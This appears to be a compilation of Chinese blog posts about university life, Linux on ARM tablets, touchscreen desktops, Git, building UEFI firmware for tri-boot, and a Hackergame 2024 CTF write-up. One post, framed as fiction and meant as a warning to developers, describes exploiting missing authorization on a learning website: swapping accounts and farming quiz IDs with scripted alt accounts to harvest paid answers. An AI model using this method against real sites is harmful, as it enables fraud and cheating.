经历两周的军训之后，我首先感受到了大学生活与高中生活最大的不同点——「自由」。由于大一上学期几乎没有早八，因此每天都睡到自然醒；与高中每日的早六晚十不同，大学的课余时间充足到了近乎散漫的地步。

骑着自行车，秋日的微风从脸庞吹过，又不由得幻想起来。

然而 … 就这样过了几周，我发觉自己的幻想和现实完全在往两个方向走。

理想中的自己：进入理想的大学后，会在门门课上取得优异成绩，参加各种学生活动，在充裕的课余时间疯狂写个人项目，GitHub 全绿，走向人生巅峰。

现实中的自己：上了大学后的绩点依然是中游，该学学该摆摆，很多活动觉得很无趣不想参加，课余时间除了稍微打点游戏之外，根本不想碰电脑，一睡睡一上午，GitHub 一片惨白，走向赛博死亡。

结束幻想的一晚

那天买了杯饮料，但喝下肚却感觉像醉了酒一样，在宿舍楼下摇摇晃晃地游荡到好晚。清醒之后，我从长椅上站起来，想着：该找些事做以改善现状了。

↩️ 方向和反方向

于是我带着这样的疑惑和迷茫，走进了十月份。

学院的信息安全系举办了一场 NEX CTF 安全竞赛，因为前一年打 Hackergame 2023 的经历，我直接报名并拿下了很优秀的成绩。随后的 Hackergame 2024 我也同样报名，并拿下了校内排名第三名。那几周我经常熬到半夜还在查资料或做尝试，不过，我感觉非常开心。

能取得如此成绩，纯粹是因为一些过去折腾网络的底子和 坏心眼子 兴趣。但也因为这个成绩，我被学校的「NEX 信息安全创新团队」录取了。

得到的第一份奖品，对我而言弥足珍贵

在入队之后，我试着与学长们一起打了国赛初赛和软件系统安全赛。但是，这两场比赛都涉及到信息安全的专业知识。我无神地望着深蓝色的比赛平台，在坐了几小时的牢后，勉强解出几道题大败而归。此后，我也断断续续做过几道 NEX 训练赛的题目，可它们都没有给我带来做两次 Hackergame 时的激动和惊喜感。

此时，缺乏坚定意志的我只能选择：退出 NEX 团队。

退队的那天，队里我很仰慕的那位学长给我写了一段很长的留言。读完留言的我百感交织，任凭泪水在脸上被寒风凝结，然而也明白了方向必须谨慎选择的道理，感觉 … 自己终于又成长了一点。

🔖 无用之用

时光又飞逝，转眼第一学期就要结束了。

学校在下学期开设了很多「通识选修课」，题材从人文历史到前沿科技无所不包，可以 为了学分 而报名学习。然而在这里，我又踩了一个大坑。

想着能学到更多专业知识，我就随意地报了两门本院开设的选修课。可上了几节后，我却发现正如「通识选修课」之名，这些课基本不涵盖深入的专业知识，讲的只是概述性质，浅尝辄止。

《区块链与数字货币》，小时候看到这集钱包里的钱自己去中心化了

到那时，我才明白自己完全理解错了学校的用意。「通识选修课」是用来扩展知识面、培养兴趣和思考能力的。我眼里浅显无用的内容，在其它学院的学生眼里确实是值得学习的实用宝贵知识。

与此同时，另外一边，四级考了六百多分沾沾自喜的我，报名了《初级日语》选修课。果然，在自己完全不熟悉的领域，通识选修课就发挥了它应有的作用。在爽拿 4 学分的同时，还接触了完全陌生的新知识，收获很大。

🏃 向前迈出第一步

原地打转了许久，四处碰壁了许久，我的大学第一年就这样过去了。一年前定下的目标远未完成，现在又要提出对下一年的展望了。

回望我在第一年里没能完成的目标，究其原因都是因为行动力差。一直在幻想，却因为种种借口而没能去做。希望在大学的第二年里，能成为一个行动力更强的人。与其抱有对未来生活的美好幻想，不如亲自迈出向前的第一步。

✨ 背景

Alice 最近总是搞不懂课业上的一些问题，很是苦恼。一天，Bob 刷到了一个学习网站，便推荐给 Alice。根据宣传，该网站上不仅有大量的免费学习资源，花“三十九块九”开通会员，更是可以观看更多的课程、享受名师在线答疑解惑等服务。

随后，Alice 登录上这个网站，发现网站上的课程确实对她的学习很有帮助。可是，Alice 完成在线课程的随堂测验后，却发现她没有会员，看不到测验的答案和解析，实在是很苦恼。由于她最近换了一台“普通百姓都能买得起”的新手机，把生活费都花光了，实在是开不起这个“三十九块九”的会员。于是，她便研究起了这个学习网站。

🔍 初探

使用免费账号登录该学习网站，并且进行一次随堂测验，发现不开会员，确实根本不知道正确答案。

打开 F12 开发者工具，发现该网站的后端使用 Java 开发，前后端通信使用 DWR 库和 JSON RPC。
由于函数名均写得简洁明了，结合响应内容，很容易发现 getOpenQuizPaperDto.rpc 为获取测验题目信息的 API。可手动调用该 API，却发现 answer 为 null，根本看不到正确答案。

简单浏览该网站并进行几次测验后，发现该网站的测验模块中，其它 API 经常使用 tid 和 aid 两个参数，进行几次同样的测验后，tid 不变，而 aid 变了。所以，我猜测 tid 为试卷 ID，aid 为用户提交的 ID。

更换 Bob 的账号，在开发者工具中调用相同的 API，填入 Alice 测验时的 tid 和 aid，果然，对比之前的响应，answer 变为了 true 和 false，拿到了单选题的正确答案。🎉

⚒️ 进阶

第二天，Alice 发现她的课学得太差，且她又是免费用户，老师根本不愿意回答她的问题。于是她起了歪脑筋，想提前获取测验的答案，以答个高分，吸引老师的注意力。

然而，测验的题目是从题库中随机抽取的，每个用户抽到的题目都不一样，以 Alice 可怜的人脉，根本不可能找足够多的人看答案。

于是，她让 AI 写了个脚本，用小号反复提交相同的测验，刷出一大堆不同的 aid 以尽可能多地覆盖题库，之后再找 Bob 借会员账号，用那些 aid 调用之前所述的 API，果真拿到了题库中大部分题的正确答案。在这之后，她便动起了歪脑筋，打开了新世界的大门。

该网站中所有涉及到在线答题的模块（如测验、作业、考试等）都使用 tid 和 aid 两个参数，即使调用方式不同，但也万变不离其宗。比如在作业模块中，使用 DWR 调用，tid 和 aid 分别对应 param0 和 param1，照样可以提前拿到答案。

在尝到利用漏洞的甜头后，Alice 爬下了整门课程的答案，甚至包括一个学员只能提交一次的结课总评，她也开了七八个小号去拼凑题库。最终，她靠着排名第一的“成绩”在所有学员中“脱颖而出”，经过数次答疑解惑，终于在学校的课程中，拿到了很高的绩点。

🤔 反思

本文的内容虽为虚构，但源于真实案例。

近一年随着 Cursor 等 AI 辅助开发工具的流行，编程门槛大幅降低，即便毫无基础的普通人，也能在短短几天内完成网站开发并顺利上线。这些工具在带来便捷与效率的同时，也衍生出一系列不容忽视的问题。部分开发者过度依赖 AI 生成代码，却缺乏对代码逻辑的深度理解与安全审查，从而闹出了本文所参考案例中的安全笑话。

在设计网站后端 API 时，一定要做好鉴权，判断好用户的输入是否合理合规，进行好安全测试。

不要让知识付费失去了付费的意义，让学习网站失去了学习的本质。

🛠️ 安装 IDE

方法一：替换 JVM 运行

1. 从官网下载 x86_64 版 Android Studio。

2. 替换 JVM 运行时：

• 删除安装目录下的 jbr 文件夹；
• 从 JetBrains Runtime 仓库下载 linux-aarch64 版本 JBR；
• 解压并重命名为 jbr 放置到原目录。

3. 通过终端执行启动脚本：

   ⚠️ 注意：Android Studio 的主程序 studio 是 x86_64 架构的二进制文件，无法在 ARM64 系统上直接启动。因此，需要运行不区分架构的 studio.sh 脚本。

   1	./bin/studio.sh

方法二：Intellij IDEA + 插件

如果你不想替换 JVM，或者只想使用发行版的打包，也可以直接安装原生支持 ARM64 的 Intellij IDEA，并通过插件市场安装 安卓开发插件。

⚙️ 配置 SDK

在 IDE 配置完毕后，你可能会遇到一个问题：在 SDK 管理器里下载的安卓 SDK 中似乎包含 x86_64 的东西，根本没办法编译运行任何项目！

这是因为安卓 SDK 中的部分工具（如 platform-tools、build-tools、NDK、模拟器等）包含了 x86_64 架构的二进制文件。为了解决这个问题，我们需要替换掉这些 x86_64 的二进制文件。

替换工具链

• 平台工具和构建工具：在 android-sdk-tools 仓库 下载预编译的 ARM64 版本，解压二进制并逐一替换 x86_64 版本。
• 模拟器：可以使用 Waydroid 或直接使用安卓真机调试。
• NDK：目前，NDK 根本就不支持 Linux ARM64，而且相关支持已经四年没有进展。

配置 Gradle 构建设置

在替换好平台工具和构建工具之后，还需要编辑你项目的 gradle.properties，加入一行：

1

android.aapt2FromMavenOverride=/path/to/your/aapt2

这将确保构建工具使用你手动下载的 ARM64 版本 aapt2，而不是从谷歌的 Maven 仓库下载 x86_64 版本。

通过以上折腾，你应该能够成功开发纯 JVM 的安卓项目。如果项目涉及原生代码，则可能需要用 qemu-user 去跑 x86_64 的 NDK … 光是想想就很灾难。

随着安卓 15 中 Linux 开发环境的加入，谷歌很可能在几年内拾起对 ARM64 Linux 的支持，相信随着 ARM 生态的蓬勃发展，安卓开发的未来必将跨越架构的藩篱，在让开发者更多设备上绽放创造力。

𝕏 旧时代的残党 —— X11

termux-x11 项目在大概 2022 年的某个版本曾经支持过触屏直通，当时有用它在安卓的 proot 容器上使用过纯触屏的 Xfce 桌面。Xfce 是我从前很喜欢的一个桌面环境，不过嘛 … 「X」fce，自然不支持 Wayland 了。

总体使用体验就像一团糨糊。在少数适配了 X Input 2.0 的软件（比如设置了 MOZ_USE_XINPUT2=1 的 Firefox 以及大部分用 Qt 编写的软件）上，可以使用手指滚动视图、缩放画面；然而在绝大部分软件，甚至是桌面本体上，触屏的点触操作都被直接简单粗暴地映射到了鼠标左键。

比如，在 Thunar 文件管理器中，如果想习惯性地通过在窗口上拖动来滚动视图，最后只会把某个文件夹拖到另一个文件夹中。正确的使用方法，是拖动窗口最右边那像微雕一样的滚动条… 用起来特别令人无语。右键更是完全没法点击。即使按住屏幕再长时间，也不会弹出任何菜单，KDE 在 X11 上倒是做了这个适配，不过，仅限于 Qt 软件。

至于打字，Xfce 上只能用 Onboard，它的按键同样也是小得和微雕一样。多指手势？更是想都不要想。配合 Touchegg 等第三方工具，才能勉强让它「能跑」，而不是「能用」。

这个使用体验，甚至远远不如 Windows XP。被打扮得极其现代化的桌面，配上如此糟糕的触控体验，就会显得非常不协调。

4202 年，KDE 和 GNOME 两个重量级桌面环境都已经迈向 Wayland，那么我们来把目光转向 Wayland 吧。

ѡ 新时代到来了吗 —— Wayland

新时代到来了吗？答案是，到来了，但没完全到来。

👣 GNOME

在买了新平板并装好 Linux 之后，我第一个开始用的桌面环境是 GNOME。毕竟 GNOME 有良好的触摸手势支持、硕大的窗口额头和 UI 元素以及看上去就像为平板设计的整体界面风格。

使用体验 … 能用，细节打磨方面还是远远不及安卓。确实有三指在桌面、多任务和启动台之间切换的手势，切换动画也非常顺滑；绝大部分软件的滚动、双指缩放等手势也都支持良好。输入文字方面，GNOME Shell 有一个功能非常完善的虚拟键盘，iBus 和 Fcitx5 输入法都支持，还能通过 GJS OSK 插件实现更高程度的自定义。

从视频也可以看出，体验已经比 X11 下好了不知道多少倍。

然而，有时候进入多任务视图之后，可能会吞操作，或者桌面整体会进入一种「卡死」状态，不会响应任何触控操作。这时候可以按 Esc 键脱离卡死。但是，我都用触屏了，你总不能指望着我时刻都有 Esc 键可以按吧 … 另外，Nautilus 文件管理器的触屏适配极其糟糕，截止到 46 版本还没法用拖动来滚动视图。47 版本倒是修复了这个问题，然而右键菜单又变得很难按出。

抛开文件管理器和卡死不谈，GNOME 的触摸体验确实非常非常优秀，甚至完全可以拿来日用。但还有更重要的一点 —— 性能。由于 Wayland 的一体化设计，在我的平板上，窗口开多了之后，整个桌面就会变得奇卡无比。所以，在用了三个月之后我立刻转到了 KDE。

⚙️ KDE

KDE 6 版本大幅改善了触摸支持，因此虽然它的 UI 设计可能不是特别贴合触屏，但实际的使用体验是好很多的。这极大地归功于 Dolphin 文件管理器的「选择模式」。这是一套专门给触屏设计的 UI，长按任一文件即可进入。

整体界面虽然略有掉帧（毕竟是 the Krash Desktop Environment），但是不影响使用体验的顺滑。起码不会出现像 GNOME 那样整体卡死的现象，也没有窗口开多了之后奇卡无比的问题。

截止目前的 KDE Plasma 6.2（KDE Gear 24.12，KDE Frameworks 6.9）版本，除了 Gwenview，其它 KDE 组件对触屏的适配都很优秀，不会出现像 5.x 一样，部分 QtQuick 界面元素完全无法点击的问题。

然而，KDE 的触屏适配也是有两面性的。KDE 使用 Maliit 作为虚拟键盘，它本身的使用体验很好。然而 —— Fcitx 5 在 Wayland 上会挤占虚拟键盘的位置，这就导致完全没法用触屏来打中文。UKUI 桌面有独立的虚拟键盘程序，可以拿来在 KDE 上用，但问题是它完全不能在 Wayland 上用，只能用卡卡的 XWayland 勉强作为过渡。好在我有实体键盘，这方面对我的体验影响不算大。

去问设计 Wayland 输入法协议的人吧！

🗃️ 第三方软件

这里的「第三方软件」是指桌面环境套件之外的软件。分成几个方面来说。

对于使用系统 Qt 的软件，需要看 Qt 版本以及软件开发者心情。得益于 Qt 优异的触摸支持，一般适配都相当不错，但部分的视图可能需要用 双指 而不是单指滚动。（在 x-d-p 的文件选择器中就是这样）

对于使用系统 GTK 3 / 4 的软件，触摸适配开箱即用。

对于 Chromium 以及 QQ、VSCode 之类的 Electron 软件，触屏的适配非常完美，但部分手势可能无法使用。用参数使其原生在 Wayland 运行即可。对于我这种高 DPI 设备，可能还需要再处理一下缩放问题。

最终我在使用的参数是 --enable-features=UseOzonePlatform,WaylandWindowDecorations --ozone-platform=wayland --disable-features=WaylandFractionalScaleV1 --enable-wayland-ime。

对于 JetBrains 系列 IDE，它们应该原生跑在 Wayland 上，触摸支持也是开箱即用。

对于使用 Waydroid 安装的安卓软件，触控体验和在安卓上基本一致。但在我用的 KDE 桌面上，触控延迟可能有些大（100ms+），所以不适合用来玩某些游戏，但基本的软件使用还是 OK 的。

对于微信、WPS Office 之类 bundle 了 Qt 库的闭源软件，可能要看软件开发者的心情。微信的触屏完全不能用，WPS 有基本的触屏适配，但图片周围的定位点、表格右下角的定位点等都不能用触屏拖动，仍然需要掏鼠标。

对于 wiliwili 之类使用 SDL / Cairo 等库自绘制图形界面的软件，也需要看软件开发者的心情。我用过的几款软件中也只有 Steam 的适配比较差，其它的都还好。

对于终端模拟器，我用过的 GNOME Terminal、GNOME Console、Konsole 和 Alacritty 均支持触屏滚动界面。Tilix、Xfce Terminal 等支持得可能不算好。当然，要在终端模拟器上选择文字的话，鼠标仍然是最优解。

对于在 Wine 中运行的 Windows 软件，触控体验远不及在原生 Windows 下良好，只能说是凑合。这种情况下鼠标是更优解。

🖊️ 笔和手写

Linux 上如果驱动支持，触控笔、压感级别支持应该是开箱即用的，并且使用体验比 Windows 更好。在 KDE 上，6.2 版本优化了手写笔支持，使用体验还会比其它桌面好一些。

在大部分的 UI 中，电容笔的光标可以作为鼠标指针使用，在专门适配的软件中则会变成笔尖。

视频中的绘板软件是 Rnote。

🤔 分析和展望

感觉 Linux 触屏生态差的很大一个原因是 —— 因为没人用，所以没人做；因为没人做，所以又没人用，形成了恶性循环。这里的「没人做」既指硬件厂商很少推出可以安装 Linux 的触屏设备，也指社区的开源软件开发者很少专门为触屏设计软件。这也是很多「小众」软硬件生态的通病。

曾经的 JingPad 就是一个典型的例子：厂商推出了平板，很少有消费者买账，于是厂商没办法盈利，就更少有人做了。KDE 上的触屏中文输入也是一个典型的例子：KDE、触屏、中文用户这三个集合可能都很大，但它们的交集是很小的，而这很小的几个人，也未必有开发 C++ 软件 / KDE 组件的能力，所以 KDE Wayland 触屏没法输入这个问题摆了这么久也没人去做。

Linux 开源社区终究是社区，「没人用，所以没人做」是一个很现实的问题。不过 2024 一年随着两大桌面环境迈向 Wayland，以及 KDE 社区的 We care about your Input 计划，作为一个没有 C++ 开发能力的最终用户，我相信 Linux 的触屏支持也能像 Windows 一样变好。

本文记录最近两次我在实际学习生活中应用 Git 的经历。

🍵 搭建 Git 服务器

由于国内糟糕的网络环境，GitHub 不能满足我的 折腾 实际使用需求了，于是我开始着手建立自己的 Git 服务器。

在众多 Git 服务器中我最终选择了 Gitea，一款用 Go 编写的自托管 Git 服务。它的操作界面和我熟悉的 GitHub 很相似，并且部署起来非常的简单。

按照官网的文档，我用 Docker 搭建起了 Gitea。真的很方便，不到一分钟就搭建好了。

在面板上添加管理员账号，设置网站信息之后，最终效果如图所示。

再使用 acme.sh 为其申请 HTTPS 证书，再使用 Caddy 反代，在路由器中添加端口映射，就这样，一个属于自己的 Git 服务就搭建好了。

🤒 一、检漏，止漏

由于现在我有两台电脑，所以在写一些不能提前公开内容的博文时，如果我写一半，之后如果想转到另外一台设备继续写，就会非常的麻烦。

之前我在写 wp 时，是用的 U 盘在两台电脑间来回拷 … 这显然过于糟心了。

现在我发现一种简单得多的办法 —— 使用两个远程仓库。

原有的 https://github.com/chiyuki0325/blog 继续作为公开仓库，再在自己的服务器上建立一个私有仓库 https://gitea.home.chyk.ink/chiyuki/blog 。

读者大可不必尝试访问 https://gitea.home.chyk.ink ，因为它在内网。（笑）

Detects leaks, STOPS leaks.

把博客仓库克隆到本地后，输入 git remote -vv，结果如下：

1
2

originhttps://github.com/chiyuki0325/blog.git (fetch)
originhttps://github.com/chiyuki0325/blog.git (push)

现在来添加第二个私有远程仓库：

1
2

git remote add private https://gitea.home.chyk.ink/chiyuki/blog.git
git push private

此时再来 git remote -vv 就会发现多出了这个私有仓库：

1
2
3
4

originhttps://github.com/chiyuki0325/blog.git (fetch)
originhttps://github.com/chiyuki0325/blog.git (push)
privatehttps://gitea.home.chyk.ink/chiyuki/blog.git (fetch)
privatehttps://gitea.home.chyk.ink/chiyuki/blog.git (push)

在写一些可能会漏的内容时，可以在提交后直接把它推到 private 远程仓库。

1
2
3

git add source
git commit -m '[draft] Xxxxxxxxxx 2024 writeup with possible leaks'
git push private main

在另一台电脑 git pull home main 即可。

写完之后，把这几次提交用 rebase 功能合并为一个，直接推到 origin 远程，一气呵成。

1
2
3
4
5

git rebase -i HEAD~2
# 把之前的几个提交的 pick 改为 s
# :wq
# 输入提交信息
git push origin main

😋 二、真正的团队合作

临近期末，学校的程序设计基础（C 语言）课程要求提交一份以小组为单位的大作业。

在别的小组还在往自己的微信群里来回发 .txt / .c 文件 / 代码压缩包「加密通话」时，我已经在带着组员们用 GIt 了。考虑到大家都没接触过命令行，我直接强行推荐了 VSCode 作为开发工具，而不是用学校教的老旧的 Code::Blocks。VSCode 界面的左侧就有 Git 的图形化操作界面，非常的好上手。

在本文发布时，大作业项目已将近完成。回望和舍友挑灯夜战 Bug 的夜晚，再看着这个提交树，就感觉到非常的舒服和有成就感 —— 我们组的大作业从未在群里发过任何一个 .c 文件，全程使用 Git 完成版本管理和代码同步。

期间倒是遇到过很多问题，比如 UTF-8 和 GBK 编码的转换，Windows 和 Linux 对于 sleep 的不同实现等，果然我还是需要锻炼啊！

答案是有的，本文我就来记录我的折腾过程。

🪟 折腾背景

微软于 2018 年发起了 Project Mu，是一款基于 TianoCore edk2 的 UEFI 固件。微软在自家的 Hyper-V 和 Surface 二合一笔记本上都使用了这个 UEFI 固件。

等等 … Surface？Surface 确实有搭载高通骁龙处理器的产品线 Surface Pro X，但它一直使用的都是高通骁龙 8cx 平台，但 GitHub 上有神人开发者开发出了 SurfaceDuoPkg 项目，它把 Project Mu 移植到了 Surface Duo 折叠手机上，在 Surface Duo 上跑起了 Windows 10X 和 Windows 11。这款手机使用的是骁龙 835 SoC，离我们的折腾目标：搭载骁龙 855 的小米平板 5 已经很接近了。

于是，以 SurfaceDuoPkg 为基础，一群开发者又发起了 Project Aloha (原名为 msmnilePkg) 项目，把 Project Mu 带到了骁龙 845 和 855 平台上，还给很多设备移植了对应的驱动程序。小米平板 5 之所以能流畅地跑起 Win11，就是这个项目的功劳。这就是本文要折腾的项目。

🗄️ 进行分区

按照 Renegade Project 文档 的分区部分或我之前的文章给平板新建一个 esp 分区，大小建议大一点，我分了 1G。

如果你折腾过 Win11，这个分区应该已经存在，应该名为 esp 或者 ESPNABU。

注意：「分区名称」和「卷标」是两个不同的概念，以下均给 ESP 分区使用 esp 这个分区名称。

🔌 编译 UEFI 固件

1
2
3
4
5
6
7

# 安装依赖
sudo apt update && sudo apt -y upgrade
sudo apt -y install python3-venv pip git mono-devel build-essential nuget build-essential uuid-dev iasl nasm gcc-aarch64-linux-gnu python3 python3-distutils python3-git python3-pip gettext locales gnupg ca-certificates python3-venv git git-core clang llvm curl jq
sudo apt install -y libc6-arm64-cross libc6-dev-arm64-cross

# 获取适用于小米平板 5 的 Project Aloha UEFI 源码
git clone https://github.com/map220v/MU-sm8150pkg --branch=nabu-secureboot --recursive

克隆这个仓库是一个极其漫长的过程。

在获取好源码后，打开 Platforms/SurfaceDuo1Pkg/SurfaceDuo1.fdf 文件，注释掉第 92 行。这行的内容如下：

INF SurfaceDuoFamilyPkg/Driver/SecureBootProvisioningDxe/SecureBootProvisioningDxe.inf

如果读者有在 x86 UEFI 平台安装过 Linux，那应该会知道，开着安全启动是没法启动 Linux 的（自己配置过证书的除外）。注释这行，就是为了禁用掉这个 UEFI 固件的安全启动。

打开 Platforms/SurfaceDuo1Pkg/Device/xiaomi-nabu/Library/PlatformMemoryMapLib/PlatformMemoryMapLib.c，将 "Kernel" 一行的 Conv 改为 Reserv。这是为了修复一个内存 Bug。

之后开始编译。

1
2
3
4
5

cd MU-sm8150pkg
python3 -m venv venv
source venv/bin/activate
pip install -r pip-requirements.txt
python3 build_uefi.py -d xiaomi-nabu

漫长的编译过程后，可在 Build/SurfaceDuo1Pkg/RELEASE_CLANG38/FV/ 文件夹中找到 SM8150_EFI.fd，拿到一旁备用。

🔌 编译 Simple Init

本文将使用 Simple Init 作为引导加载程序。

按照此工作流所述的编译方法进行编译。

1
2
3

# 安装依赖
sudo apt update
sudo apt install --yes --no-install-recommends build-essential uuid-dev iasl nasm gcc-aarch64-linux-gnu gcc-arm-none-eabi gcc-i686-linux-gnu gettext

1
2
3
4
5
6
7

# 获取源码
git clone https://github.com/BigfootACA/simple-init --recursive
cd simple-init
git clone https://github.com/tianocore/edk2 --recursive
pushd edk2
git checkout fff6d81270b57ee786ea18ad74f43149b9f03494
popd

在获取源码后可以对源码树进行一些定制。

我在使用 AOSC OS，Simple Init 的启动菜单没有包含它的图标，所以手动下载并放到其中。

1

wget 'https://raw.githubusercontent.com/AOSC-Dev/logo/05268213521f168aedb96dc1f4573b64e1f205a1/aosc-os.svg' -O root/usr/share/pixmaps/simple-init/aosc-os.svg

1
2

# 进行编译
bash scripts/build-edk2.sh AARCH64

在漫长的编译过程结束后，可在 build-edk2/Build/SimpleInit/RELEASE_GCC5/AARCH64 中找到一个 8MB 的 SimpleInitMain.efi。把它放到一旁，改名为 BOOTAA64.EFI 备用。

🐧 放置启动 Linux 所需的文件

首先要把所需的文件放置到 esp 分区中。

在编译内核时，我使用的安装命令如下：

1

make zinstall modules_install dtbs_install INSTALL_MOD_PATH=../modules_install INSTALL_PATH=../modules_install/boot INSTALL_MOD_STRIP=1 INSTALL_DTBS_PATH=../modules_install/boot/dtbs

因此可以在 ../modules_install/boot 中找到 vmlinuz 开头的内核镜像文件，在 dtbs 文件夹中找到 sm8150-xiaomi-nabu.dtb。

把内核镜像文件（我这里为 vmlinuz-6.12.0-1-sm8150-chiyuki+ 和 dtb 文件（sm8150-xiaomi-nabu.dtb）放到 esp 分区的根目录中。这步可以使用之前文章提到过的大容量存储模式（msc），或者直接在 Linux 上操作。

🪟 配置 Windows Boot Manager

☣️ 启用测试模式

米板 5 的 WoA，如果在没开安全启动的情况下，想要开机，就必须要打开驱动测试模式，否则将会直接蓝屏（我的翻车经历…）

打开驱动测试模式后，验证系统安全性的游戏和反作弊软件将会无法启动，比如腾讯 ACE 反作弊系统。

按照 Renegade 的文档操作即可。

🖥️ 使用 Simple Init 替换 Boot Manager EFI

把 esp 分区中原有的的 Boot/EFI/BootAA64.efi 重命名（我这里为 windows.efi），并把之前编译好的 Simple Init BOOTAA64.EFI 放入 Boot/EFI 文件夹中，以取代 Windows Boot Manager。

🔌 配置 Simple Init

在 Linux 中（或使用大容量存储模式 msc）挂载 LOGFS 分区，在其中创建一个 simpleinit.uefi.cfg。

参考 Simple Init 文档 配置引导加载程序。这里贴一下我的配置，仅供参考。

boot.configs.linux.extra.kernel 和boot.configs.linux.extra.dtb 即为之前放置的两个文件，boot.configs.linux.extra.cmdline 为之前安装 Linux 时在 mkbootimg 那步配置的内核命令行参数。

boot.configs.win11.extra.efi_file 即为之前移走的 Windows Boot Manager。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

language = "zh_CN"
boot.configs.linux.mode = 8
boot.configs.linux.desc = "AOSC OS"
boot.configs.linux.show = true
boot.configs.linux.enabled = true
boot.configs.linux.icon = "aosc-os.svg"
boot.configs.linux.extra.use_uefi = true
boot.configs.linux.extra.kernel = "@part_esp:\\vmlinuz-6.12.0-1-sm8150-chiyuki+"
boot.configs.linux.extra.dtb = "@part_esp:\\sm8150-xiaomi-nabu.dtb"
boot.configs.linux.extra.skip_kernel_fdt_cmdline = true
boot.configs.linux.extra.update_splash = false
boot.configs.linux.extra.cmdline = "pd_ignore_unused clk_ignore_unused console=tty0 console=ttyGS0 root=PARTLABEL=aosc rw rootwait nowatchdog"
boot.configs.win11.mode = 9
boot.configs.win11.desc = "Windows 11"
boot.configs.win11.show = true
boot.configs.win11.enabled = true
boot.configs.win11.icon = "distributor-logo-windows.svg"
boot.configs.win11.extra.efi_file = "@part_esp:\\EFI\\Boot\\windows.efi"
boot.default = "linux"
boot.second = "simple-init"
boot.uefi_probe = false
boot.title = "选择操作系统"
boot.timeout = 5
boot.timeout_text = "倒计时: %d"
sw = 8
locates.part_logfs.by_disk_label = "gpt"
locates.part_logfs.by_gpt_name = "logfs"
locates.part_esp.by_disk_label = "gpt"
locates.part_esp.by_gpt_name = "esp"
gui.show_background = true
gui.background = ""
gui.dark = true
w = 8

💿 修补并刷入启动镜像

如果直接把第一步编译出来的 xiaomi-nabu.img 刷入平板的 boot 分区，可以在 Simple Init 的启动菜单中选择 Linux 和 Windows 启动，但我们目前仍然没法启动安卓。

SurfaceDuoPkg 项目有一个 内核修补工具，可以把这个 UEFI 固件直接注入到安卓内核中，并在开机时通过一小段简单的代码来判断该引导 UEFI 还是安卓。Project Aloha 也存在对应的工具，并且支持米板 5。

1
2
3
4
5
6
7
8
9

# 获取 DualBootKernelPatcher 源码
git clone https://github.com/Project-Aloha/DualBootKernelPatcher
cd DualBootKernelPatcher
cmake -B output -S .
cmake --build output -j
pushd ShellCode
cmake .
make
popd

之后需要使用 magiskboot 工具从安卓启动镜像中分离出内核，以进行修补。这步可以在装有 Magisk 的安卓机上操作，也可以自行在电脑上编译之并操作。

1

magiskboot unpack boot.img

1

./output/DualBootKernelPatcher kernel SM8150_EFI.fd patchedkernel Config/DualBoot.Sm8150.cfg ShellCode/ShellCode.Nabu.bin

这里的 kernel 文件为上一步解包出的内核，SM8150_EFI.fd 之前已经编译好。

把 patchedkernel 改名为 kernel，与 boot.img 放在同一文件夹，并重新生成新的启动镜像。

1

magiskboot repack boot.img

现在就可以把生成的 new-boot.img 直接刷入平板了。

1

fastboot flash boot new-boot.img

大功告成！

▶️ 如何切换三系统

• 合着盖子开机 —— 引导安卓。
• 开着盖子开机 —— 引导 UEFI 固件，可以在 Simple Init 启动菜单中选择 Windows 和 Linux。

如果没有官方保护套，使用带磁吸的第三方保护套也是一样的效果。

最后得分 4900，排名 60/2460，校内排名 3/126。

有些题（比如区块链、RISC-V）完全没有思路，这里就不写啦。

🚩 ✅ 签到题

题目要求在 60 秒内输入 12 种不同语言的「启动」，同时还会播放一首非常上头的主题歌，neta 了之前非常火的「沙威玛传奇」。

套路和之前一样还是改 url 参数，如果什么都不输直接启动，url 参数为 ?pass=false，改为 true 即可拿到 flag。

启动！

👊 ✅ 喜欢做签到的 CTFer 你们好呀

这次居然有两道签到题 …

「有两个 flag 就藏在中国科学技术大学校内 CTF 战队的招新主页里」，于是打开主页。
这个主页采用 LiveTerm 模板制作，之前一个群友的主页就是用它做的。

首先输入 help 简单看看有什么命令 …

1
2
3
4
5
6
7
8
9

Welcome! Here are all the available commands:

=========== Available Commands ===============

about awards banner bing cat cd echo
email env github help ls members nvim
readme repo sudo sumfetch vi whoami 

==============================================

输入 sudo 会直接播放奶龙 … 可还行 …

输入 env，会发现第一个 flag 藏在环境变量 $FLAG 里。居然是 NixOS 爱好者

1
2
3
4
5
6
7

ctfer@ustc-nebula:$ ~ env
PWD=/root/Nebula-Homepage
ARCH=loong-arch
NAME=Nebula-Dedicated-High-Performance-Workstation
OS=NixOS❄️
FLAG=flag{actually_theres_another_flag_here_trY_to_f1nD_1t_y0urself___join_us_ustc_nebula}
REQUIREMENTS=1. you must come from USTC; 2. you must be interested in security!

输入 ls -a 会发现隐藏的文件 .flag，cat 即可。

1
2

ctfer@ustc-nebula:$ ~ cat .flag
flag{0k_175_a_h1dd3n_s3c3rt_f14g___please_join_us_ustc_nebula_anD_two_maJor_requirements_aRe_shown_somewhere_else}

🐱 ✅ 猫咪问答（Hackergame 十周年纪念版）

多年回答猫咪问答的猫咪大多目光锐利，极度自信，且智力逐年增加，最后完全变成猫咪问答高手。回答猫咪问答会优化身体结构，突破各种猫咪极限。猫咪一旦开始回答猫咪问答，就说明这只猫咪的智慧品行样貌通通都是上等，这辈子注定在猫咪界大有作为。

欸？真的会变聪明嘛？

1. 在 Hackergame 2015 比赛开始前一天晚上开展的赛前讲座是在哪个教室举行的？

   搜索到 contest [SEC@USTC] 的存档页面，得到答案 3A204

2. 众所周知，Hackergame 共约 25 道题目。近五年（不含今年）举办的 Hackergame 中，题目数量最接近这个数字的那一届比赛里有多少人注册参加？

   翻阅往届 Hackergame 题目数量：
   2019 - 28；2020 - 31；2021 - 31；2022 - 33；2023 - 29

   于是在 Hackergame 2019 相关新闻网页得到答案 2682。

3. Hackergame 2018 让哪个热门检索词成为了科大图书馆当月热搜第一？

   搜索 Hackergame 2018 图书馆，在 2018 年 writeup 中获得答案 程序员的自我修养。

4. 在今年的 USENIX Security 学术会议上中国科学技术大学发表了一篇关于电子邮件伪造攻击的论文，在论文中作者提出了 6 种攻击方法，并在多少个电子邮件服务提供商及客户端的组合上进行了实验？

   搜索 USENIX email spoofing University of Science and Technology of China，得到 论文。
   在第 9 页（页码 1250）发现 resulting in 336 combinations，得到答案 336。

